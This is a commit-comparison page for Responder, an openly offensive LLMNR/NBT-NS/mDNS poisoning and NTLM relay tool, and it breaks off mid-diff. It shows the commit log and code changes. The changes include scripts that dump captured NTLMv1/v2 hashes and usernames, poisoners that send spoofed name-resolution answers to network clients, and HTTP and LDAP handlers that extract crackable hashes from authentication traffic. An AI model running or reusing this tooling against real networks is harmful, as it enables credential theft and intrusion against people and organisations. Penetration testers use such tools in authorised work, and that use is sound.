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64 Commits
v2.3.2.7 ... v2.3.3.9

Author SHA1 Message Date
lgandx
b37f56264a Added: check for null sessions and MS17-010 2017-11-19 22:58:28 -03:00
lgandx
207b0d455c added support for plain auth 2017-09-06 02:07:41 -03:00
lgandx
679cf65cff Changed the complete LDAP parsing hash algo (ntlmv2 bug). 2017-09-04 23:15:27 -03:00
lgandx
be26b504b5 Fixed various bugs and improved the LDAP module. 2017-09-04 21:57:51 -03:00
lgandx
75aa21bbb9 Several Bugfix 2017-09-04 18:50:04 -03:00
lgandx
ffca0e2a92 Merge pull request #61 from OJ/fix-ldap-hash-parsing 
Pass Challenge value to the LDAP parsing function
 2017-08-24 22:00:10 -03:00
OJ
33bde41902 Pass Challenge value to the LDAP parsing function 2017-08-25 09:03:01 +10:00
lgandx
95c0d6e673 Merge pull request #58 from megabug/mssql-browser 
Add Microsoft SQL Server Browser responder
 2017-07-15 13:23:08 -03:00
lgandx
0436b47a2c Merge pull request #59 from breakersall/patch-2 
Add in check for uptime since March 14th 2017, which could indicate t…
 2017-07-15 13:19:53 -03:00
Matt Kelly
5859c31e8e Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 
Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 (EternalBlue/dismay style exploit)
 2017-06-28 14:09:05 -05:00
Matthew Daley
bc90f8fe27 Update README.md with new SQL Browser port usage 2017-06-28 19:15:07 +12:00
Matthew Daley
bff935e71e Add Microsoft SQL Server Browser responder 
When connecting to a named instance, a SQL client (at least SQL Server
Native Client) will send a request (namely a CLNT_UCAST_INST message) to
the server's SQL Server Browser service for instance connection
information. If it gets no response, the connection attempt fails.

By adding a SQL Server Browser responder for these requests, we ensure
that connections are successfully made to the SQL Server responder for
hash capture.

As per the comment, this is based on the document "[MC-SQLR]: SQL Server
Resolution Protocol", currently available at
<https://msdn.microsoft.com/en-us/library/cc219703.aspx>.
 2017-06-28 19:14:38 +12:00
lgandx
38219e249e added: mimi32 cmd, MultiRelay random RPC & Namedpipe & latest mimikatz 2017-03-30 23:39:41 -03:00
lgandx
2223ef6689 updated readme 2017-03-29 14:24:17 -03:00
lgandx
2a80c7ed9c MultiRelay 2.0 Release 2017-03-29 13:28:31 -03:00
lgandx
b05bdcab96 Removed Paypal donation link. 2017-03-15 19:15:46 -03:00
lgandx
6f3cc4564c Fixed bug in FindSMB2UPTime 2017-03-08 00:01:38 +01:00
lgandx
2b322b227e minor fix 2017-02-18 20:57:36 +01:00
lgandx
9440cb3e30 Merge branch 'master' of https://github.com/lgandx/Responder 2017-02-18 20:40:01 +01:00
lgandx
21d48be98f Added: Hashdump, Stats report 2017-02-18 20:38:40 +01:00
lgandx
c9609bd8c6 Merge pull request #25 from joshuaskorich/master 
added `ip` commands in addition to ifconfig and netstat
 2017-02-10 22:03:46 +01:00
lgandx
0642999741 fixed crash: typo. 2017-02-10 18:18:23 +01:00
lgandx
5f59f2934e Merge pull request #33 from skelsec/master 
Fixing HTTP header issue
 2017-02-09 22:40:28 +01:00
skelsec
225857b6ed cleaning up comments 2017-02-06 10:48:23 -08:00
skelsec
2c32704b85 SimpleSSL 2017-02-06 09:42:35 -08:00
skelsec
0e3e6f9745 making HTTP great again 2017-02-06 09:21:44 -08:00
lgandx
0ede767d95 Merge pull request #32 from Gifts/fix_randchallenge 
Fix for RandomChallenge function.
 2017-02-01 22:32:13 +01:00
Gifts
de6e869a79 Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string 2017-02-01 16:55:15 +03:00
lgandx
cf654ee178 Merge pull request #28 from kithack/master 
Fix Proxy_Auth. Random challenge broke it.
 2017-01-19 22:31:52 +01:00
Timon Hackenjos
5a2ee18bfa Fix Proxy_Auth. Random challenge broke it. 2017-01-19 17:46:21 +01:00
thejosko
db61f243c9 added ip commands in addition to ifconfig and netstat 2017-01-11 17:35:08 -06:00
lgandx
0d441d1899 Added: Random challenge for each requests (default) 2017-01-03 17:40:38 -03:00
lgandx
1d38cd39af Added: Random challenge for each requests (default) 2017-01-03 17:35:49 -03:00
lgandx
17dc81cb68 Added paypal button 2016-12-21 11:53:33 -03:00
lgandx
ab2d8907f0 Added: Scripting support. -c and -d command line switch 2016-11-18 11:55:16 -03:00
lgandx
730808c83c Added: BTC donation address 2016-11-12 12:28:13 -03:00
lgandx
b455ff406f re-fixed Typo 2016-11-10 14:28:16 -03:00
lgandx
aff17ca9d3 MultiRelay now executes WMIC commands instead of bat files 2016-11-10 14:24:54 -03:00
lgandx
62d7dc4080 Merge pull request #18 from trustedsec/patch-1 
Update RelayMultiCore.py
 2016-11-10 10:57:18 -03:00
trustedsec
cad3adc319 Update RelayMultiCore.py 
Minor typo fixes, nothing major.
 2016-11-10 14:13:13 +01:00
lgandx
fc2aadca6e Minor fix 2016-11-09 14:12:37 -03:00
lgandx
90071187cd Merge pull request #17 from leonjza/master 
Check if the platform is macOS before setting TCP_KEEPIDLE
 2016-11-02 11:18:10 -03:00
Leon Jacobs
bcac8c4166 Check if the platform is macOS before trying to set a non-exported 
TCP_KEEPIDLE option
 2016-11-02 09:25:37 +02:00
lgandx
4a7499df03 Removed ThreadingMixIn. MultiRelay should process one request at the timeand queue the next ones. 2016-10-20 23:43:34 -03:00
lgandx
581d7e6849 Merge pull request #14 from nvssks/master 
Patch for Android 4.x terminals that are missing some linux commands
 2016-10-20 01:03:10 -03:00
Nikos Vassakis
f321c1bbcc Patch for Android 4.x terminals that are missing some linux commands 2016-10-19 18:24:12 +01:00
lgandx
027f841cdf Fixed wrong challenge issue 2016-10-18 11:53:09 -03:00
lgandx
4b7e6397cc Now grabs and print time on remote machine. 2016-10-15 14:54:05 -03:00
lgandx
d5601056b3 Added: Logs dumped files for multiple targets 2016-10-15 11:48:36 -03:00
lgandx
6bcd6c44cd updated to current version. 2016-10-12 13:46:16 -03:00
lgandx
6af72d27c4 MultiRelay initial commit 2016-10-12 13:33:49 -03:00
lgandx
10d33eba72 Minor fix 2016-10-12 13:26:45 -03:00
lgandx
3e46ecd27e Changed to executable 2016-10-12 13:25:39 -03:00
lgandx
176d04b6c5 Removing old Relay scripts 2016-10-12 13:20:37 -03:00
lgandx
57c7e3c691 Removing old Relay scripts 2016-10-12 13:18:49 -03:00
lgandx
5b0617361e Added: Compability for Multi-Relay 2016-10-12 13:16:11 -03:00
lgandx
f6e560b7fd initial commit 2016-10-12 13:09:55 -03:00
lgandx
9c91658fe8 Minor fix 2016-10-12 01:04:11 -03:00
lgandx
60c91c6626 Fix values for win98 and win10 (requested here: d9d34f04cd) 2016-10-12 00:49:34 -03:00
lgandx
72603dc482 Minor fix 2016-10-12 00:27:54 -03:00
lgandx
ce211f7fcf Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6) 2016-10-12 00:24:31 -03:00
lgandx
0cf1087010 fixed bug in hash parsing. 2016-10-09 22:20:06 -03:00
lgandx
0713c0350f updated version number 2016-10-06 17:35:55 -03:00
lgandx
c6e401c229 Added: Now delete services on the fly. 2016-10-06 17:28:27 -03:00
56 changed files with 6820 additions and 1900 deletions
Expand all files Collapse all files

49
DumpHash.py Executable file
View File

@@ -0,0 +1,49 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlite3
def DumpHashToFile(outfile, data):
with open(outfile,"w") as dump:
dump.write(data)
def DbConnect():
cursor = sqlite3.connect("./Responder.db")
return cursor
def GetResponderCompleteNTLMv2Hash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
Output = ""
for row in res.fetchall():
Output += '{0}'.format(row[0])+'\n'
return Output
def GetResponderCompleteNTLMv1Hash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
Output = ""
for row in res.fetchall():
Output += '{0}'.format(row[0])+'\n'
return Output
cursor = DbConnect()
print "Dumping NTLMV2 hashes:"
v2 = GetResponderCompleteNTLMv2Hash(cursor)
DumpHashToFile("DumpNTLMv2.txt", v2)
print v2
print "\nDumping NTLMv1 hashes:"
v1 = GetResponderCompleteNTLMv1Hash(cursor)
DumpHashToFile("DumpNTLMv1.txt", v1)
print v1

28
README.md
View File

@@ -1,6 +1,6 @@
# Responder.py #
# Responder/MultiRelay #
LLMNR/NBT-NS/mDNS Poisoner
LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.
Author: Laurent Gaffie <laurent.gaffie@gmail.com > https://g-laurent.blogspot.com
@@ -89,7 +89,7 @@ Additionally, all captured hashed are logged into an SQLite database which you c
## Considerations ##
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
- This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389,TCP 1433, UDP 1434, TCP 80, TCP 139, TCP 445, TCP 21, TCP 3141,TCP 25, TCP 110, TCP 587, TCP 3128 and Multicast UDP 5553.
- If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.
@@ -162,15 +162,37 @@ Options:
-v, --verbose Increase verbosity.
## Donation ##
You can contribute to this project by donating to the following BTC address:
1Pv9rZMNfy9hsW19eQhNGs22gY9sf6twjW
## Acknowledgments ##
Late Responder development has been possible because of the donations received from individuals and companies.
We would like to thanks those major donator:
- SecureWorks : https://www.secureworks.com/
- Black Hills Information Security: http://www.blackhillsinfosec.com/
- TrustedSec: https://www.trustedsec.com/
- And all, ALL the pentesters around the world who donated to this project.
Thank you.
## Copyright ##
NBT-NS/LLMNR Responder
Responder, a network take-over set of tools created and maintained by Laurent Gaffie.
email: laurent.gaffie@gmail.com
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or

95
Report.py Executable file
View File

@@ -0,0 +1,95 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlite3
import os
def color(txt, code = 1, modifier = 0):
if txt.startswith('[*]'):
settings.Config.PoisonersLogger.warning(txt)
elif 'Analyze' in txt:
settings.Config.AnalyzeLogger.warning(txt)
if os.name == 'nt': # No colors for windows...
return txt
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def DbConnect():
cursor = sqlite3.connect("./Responder.db")
return cursor
def GetResponderData(cursor):
res = cursor.execute("SELECT * FROM Responder")
for row in res.fetchall():
print('{0} : {1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}'.format(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8]))
def GetResponderUsernamesStatistic(cursor):
res = cursor.execute("SELECT COUNT(DISTINCT UPPER(user)) FROM Responder")
for row in res.fetchall():
print color('[+] In total {0} unique user accounts were captured.'.format(row[0]), code = 2, modifier = 1)
def GetResponderUsernames(cursor):
res = cursor.execute("SELECT DISTINCT user FROM Responder")
for row in res.fetchall():
print('User account: {0}'.format(row[0]))
def GetResponderUsernamesWithDetails(cursor):
res = cursor.execute("SELECT client, user, module, type, cleartext FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder) ORDER BY client")
for row in res.fetchall():
print('IP: {0} module: {1}:{3}\nuser account: {2}'.format(row[0], row[2], row[1], row[3]))
def GetResponderCompleteHash(cursor):
res = cursor.execute("SELECT fullhash FROM Responder WHERE UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)")
for row in res.fetchall():
print('{0}'.format(row[0]))
def GetUniqueLookups(cursor):
res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
for row in res.fetchall():
print('IP: {0}, Protocol: {1}, Looking for name: {2}'.format(row[2], row[1], row[3]))
def GetStatisticUniqueLookups(cursor):
res = cursor.execute("SELECT COUNT(*) FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned)")
for row in res.fetchall():
print color('[+] In total {0} unique queries were poisoned.'.format(row[0]), code = 2, modifier = 1)
def SavePoisonersToDb(result):
for k in [ 'Poisoner', 'SentToIp', 'ForName', 'AnalyzeMode']:
if not k in result:
result[k] = ''
def SaveToDb(result):
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
cursor = DbConnect()
print color("[+] Generating report...", code = 3, modifier = 1)
print color("[+] Unique lookups ordered by IP:", code = 2, modifier = 1)
GetUniqueLookups(cursor)
GetStatisticUniqueLookups(cursor)
print color("\n[+] Extracting captured usernames:", code = 2, modifier = 1)
GetResponderUsernames(cursor)
print color("\n[+] Username details:", code = 2, modifier = 1)
GetResponderUsernamesWithDetails(cursor)
GetResponderUsernamesStatistic(cursor)
#print color("\n[+] Captured hashes:", code = 2, modifier = 1)
#GetResponderCompleteHash(cursor)

5
Responder.conf
View File

@@ -13,8 +13,9 @@ HTTPS = On
DNS = On
LDAP = On
; Custom challenge
Challenge = 1122334455667788
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = Random
; SQLite Database file
; Delete this file to re-capture previously captured hashes

47
Responder.py
View File

@@ -62,11 +62,17 @@ settings.Config.ExpandIPRanges()
if settings.Config.AnalyzeMode:
print color('[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.', 3, 1)
#Create the DB, before we start Responder.
CreateResponderDb()
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
if settings.Config.Bind_To_ALL:
pass
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
except:
pass
UDPServer.server_bind(self)
@@ -75,7 +81,10 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
if settings.Config.Bind_To_ALL:
pass
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
except:
pass
TCPServer.server_bind(self)
@@ -84,7 +93,10 @@ class ThreadingTCPServerAuth(ThreadingMixIn, TCPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
if settings.Config.Bind_To_ALL:
pass
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
except:
pass
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0))
@@ -101,7 +113,10 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
if settings.Config.Bind_To_ALL:
pass
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
except:
pass
UDPServer.server_bind(self)
@@ -109,7 +124,6 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
def server_bind(self):
MADDR = "224.0.0.252"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
@@ -117,7 +131,10 @@ class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
if settings.Config.Bind_To_ALL:
pass
else:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Interface+'\0')
except:
pass
UDPServer.server_bind(self)
@@ -130,7 +147,7 @@ ThreadingTCPServerAuth.allow_reuse_address = 1
def serve_thread_udp_broadcast(host, port, handler):
try:
server = ThreadingUDPServer(('', port), handler)
server = ThreadingUDPServer((host, port), handler)
server.serve_forever()
except:
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
@@ -150,12 +167,13 @@ def serve_LLMNR_poisoner(host, port, handler):
server = ThreadingUDPLLMNRServer((host, port), handler)
server.serve_forever()
except:
raise
print color("[!] ", 1, 1) + "Error starting UDP server on port " + str(port) + ", check permissions or other servers running."
def serve_thread_udp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingUDPServer((settings.Config.Bind_To, port), handler)
server = ThreadingUDPServer((host, port), handler)
server.serve_forever()
else:
server = ThreadingUDPServer((host, port), handler)
@@ -166,7 +184,7 @@ def serve_thread_udp(host, port, handler):
def serve_thread_tcp(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
else:
server = ThreadingTCPServer((host, port), handler)
@@ -177,7 +195,7 @@ def serve_thread_tcp(host, port, handler):
def serve_thread_tcp_auth(host, port, handler):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServerAuth((settings.Config.Bind_To, port), handler)
server = ThreadingTCPServerAuth((host, port), handler)
server.serve_forever()
else:
server = ThreadingTCPServerAuth((host, port), handler)
@@ -192,7 +210,7 @@ def serve_thread_SSL(host, port, handler):
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, port), handler)
server = ThreadingTCPServer((host, port), handler)
server.socket = ssl.wrap_socket(server.socket, certfile=cert, keyfile=key, server_side=True)
server.serve_forever()
else:
@@ -223,8 +241,8 @@ def main():
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTP,)))
if settings.Config.SSL_On_Off:
from servers.HTTP import HTTPS
threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTPS,)))
from servers.HTTP import HTTP
threads.append(Thread(target=serve_thread_SSL, args=('', 443, HTTP,)))
if settings.Config.WPAD_On_Off:
from servers.HTTP_Proxy import HTTP_Proxy
@@ -250,8 +268,9 @@ def main():
threads.append(Thread(target=serve_thread_tcp, args=('', 88, KerbTCP,)))
if settings.Config.SQL_On_Off:
from servers.MSSQL import MSSQL
from servers.MSSQL import MSSQL, MSSQLBrowser
threads.append(Thread(target=serve_thread_tcp, args=('', 1433, MSSQL,)))
threads.append(Thread(target=serve_thread_udp_broadcast, args=('', 1434, MSSQLBrowser,)))
if settings.Config.FTP_On_Off:
from servers.FTP import FTP

35
packets.py
View File

@@ -1597,4 +1597,39 @@ class SMB2Session2Data(Packet):
])
######################FindSMBTime.py##########################
class SMBHeaderReq(Packet):
fields = OrderedDict([
("Proto", "\xff\x53\x4d\x42"),
("Cmd", "\x72"),
("Error-Code", "\x00\x00\x00\x00" ),
("Flag1", "\x10"),
("Flag2", "\x00\x00"),
("Pidhigh", "\x00\x00"),
("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("Reserved", "\x00\x00"),
("TID", "\x00\x00"),
("PID", "\xff\xfe"),
("UID", "\x00\x00"),
("MID", "\x00\x00"),
])
class SMB2NegoReq(Packet):
fields = OrderedDict([
("Wordcount", "\x00"),
("Bcc", "\x62\x00"),
("Data", "")
])
def calculate(self):
self.fields["Bcc"] = struct.pack("<H",len(str(self.fields["Data"])))
class SMB2NegoDataReq(Packet):
fields = OrderedDict([
("StrType","\x02" ),
("dialect", "NT LM 0.12\x00"),
("StrType1","\x02"),
("dialect1", "SMB 2.002\x00"),
("StrType2","\x02"),
("dialect2", "SMB 2.???\x00"),
])

13
poisoners/LLMNR.py
View File

@@ -62,13 +62,24 @@ class LLMNR(BaseRequestHandler): # LLMNR Server class
if settings.Config.AnalyzeMode:
LineHeader = "[Analyze mode: LLMNR]"
print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
LineHeader = "[*] [LLMNR]"
print color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
if Finger is not None:
print text("[FINGER] OS Version : %s" % color(Finger[0], 3))
print text("[FINGER] Client Version : %s" % color(Finger[1], 3))

12
poisoners/MDNS.py
View File

@@ -51,6 +51,12 @@ class MDNS(BaseRequestHandler):
if settings.Config.AnalyzeMode: # Analyze Mode
if Parse_IPV6_Addr(data):
print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
SavePoisonersToDb({
'Poisoner': 'MDNS',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
if Parse_IPV6_Addr(data):
@@ -60,3 +66,9 @@ class MDNS(BaseRequestHandler):
soc.sendto(str(Buffer), (MADDR, MPORT))
print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
SavePoisonersToDb({
'Poisoner': 'MDNS',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '0',
})

13
poisoners/NBTNS.py
View File

@@ -54,6 +54,12 @@ class NBTNS(BaseRequestHandler):
if settings.Config.AnalyzeMode: # Analyze Mode
LineHeader = "[Analyze mode: NBT-NS]"
print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
Buffer = NBT_Ans()
Buffer.calculate(data)
@@ -62,6 +68,13 @@ class NBTNS(BaseRequestHandler):
print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
if Finger is not None:
print text("[FINGER] OS Version : %s" % color(Finger[0], 3))
print text("[FINGER] Client Version : %s" % color(Finger[1], 3))

24
servers/Browser.py
View File

@@ -22,18 +22,18 @@ import struct
def WorkstationFingerPrint(data):
return {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x01" :"Windows XP",
"\x05\x02" :"Windows XP(64-Bit)/Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
"\x06\x02" :"Windows 8/Server 2012",
"\x06\x03" :"Windows 8.1/Server 2012R2",
"\x10\x00" :"Windows 10/Server 2016",
}.get(data, 'Unknown')
"\x04\x00" :"Windows 95",
"\x04\x0A" :"Windows 98",
"\x04\x5A" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x01" :"Windows XP",
"\x05\x02" :"Windows XP(64-Bit)/Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
"\x06\x02" :"Windows 8/Server 2012",
"\x06\x03" :"Windows 8.1/Server 2012R2",
"\x0A\x00" :"Windows 10/Server 2016",
}.get(data, 'Unknown')
def RequestType(data):

71
servers/HTTP.py
View File

@@ -25,7 +25,7 @@ from packets import WPADScript, ServeExeFile, ServeHtmlFile
# Parse NTLMv1/v2 hash.
def ParseHTTPHash(data, client, module):
def ParseHTTPHash(data, Challenge, client, module):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
@@ -42,7 +42,7 @@ def ParseHTTPHash(data, client, module):
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, Challenge.encode('hex'))
SaveToDb({
'module': module,
'type': 'NTLMv1',
@@ -61,7 +61,7 @@ def ParseHTTPHash(data, client, module):
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, Challenge.encode('hex'), NTHash[:32], NTHash[32:])
SaveToDb({
'module': module,
@@ -173,7 +173,7 @@ def GrabURL(data, host):
print text("[HTTP] POST Data: %s" % ''.join(POSTDATA).strip())
# Handle HTTP packet sequence.
def PacketSequence(data, client):
def PacketSequence(data, client, Challenge):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
@@ -192,13 +192,14 @@ def PacketSequence(data, client):
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
print "Challenge 2:", Challenge.encode('hex')
if Packet_NTLM == "\x01":
GrabURL(data, client)
GrabReferer(data, client)
GrabHost(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=settings.Config.Challenge)
Buffer = NTLM_Challenge(ServerChallenge=Challenge)
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans()
@@ -211,7 +212,7 @@ def PacketSequence(data, client):
module = "WebDAV"
else:
module = "HTTP"
ParseHTTPHash(NTLM_Auth, client, module)
ParseHTTPHash(NTLM_Auth, Challenge, client, module)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
print text("[HTTP] WPAD (auth) file sent to %s" % client)
@@ -265,43 +266,47 @@ class HTTP(BaseRequestHandler):
def handle(self):
try:
for x in range(2):
Challenge = RandomChallenge()
while True:
self.request.settimeout(3)
data = self.request.recv(8092)
remaining = 10*1024*1024 #setting max recieve size
data = ''
while True:
buff = ''
buff = self.request.recv(8092)
if buff == '':
break
data += buff
remaining -= len(buff)
if remaining <= 0:
break
#check if we recieved the full header
if data.find('\r\n\r\n') != -1:
#we did, now to check if there was anything else in the request besides the header
if data.find('Content-Length') == -1:
#request contains only header
break
else:
#searching for that content-length field in the header
for line in data.split('\r\n'):
if line.find('Content-Length') != -1:
line = line.strip()
remaining = int(line.split(':')[1].strip()) - len(data)
#now the data variable has the full request
Buffer = WpadCustom(data, self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.request.send(Buffer)
self.request.close()
if settings.Config.Verbose:
print text("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
else:
Buffer = PacketSequence(data,self.client_address[0])
Buffer = PacketSequence(data,self.client_address[0], Challenge)
self.request.send(Buffer)
except socket.error:
pass
# HTTPS Server class
class HTTPS(StreamRequestHandler):
def setup(self):
self.exchange = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
def handle(self):
try:
data = self.exchange.recv(8092)
self.exchange.settimeout(0.5)
Buffer = WpadCustom(data,self.client_address[0])
if Buffer and settings.Config.Force_WPAD_Auth == False:
self.exchange.send(Buffer)
if settings.Config.Verbose:
print text("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
else:
Buffer = PacketSequence(data,self.client_address[0])
self.exchange.send(Buffer)
except:
pass

105
servers/LDAP.py
View File

@@ -27,49 +27,65 @@ def ParseSearch(data):
elif re.search(r'(?i)(objectClass0*.*supportedSASLMechanisms)', data):
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
SSPIStart = data[42:]
LMhashLen = struct.unpack('<H',data[54:56])[0]
def ParseLDAPHash(data,client, Challenge): #Parse LDAP NTLMSSP v1/v2
SSPIStart = data.find('NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
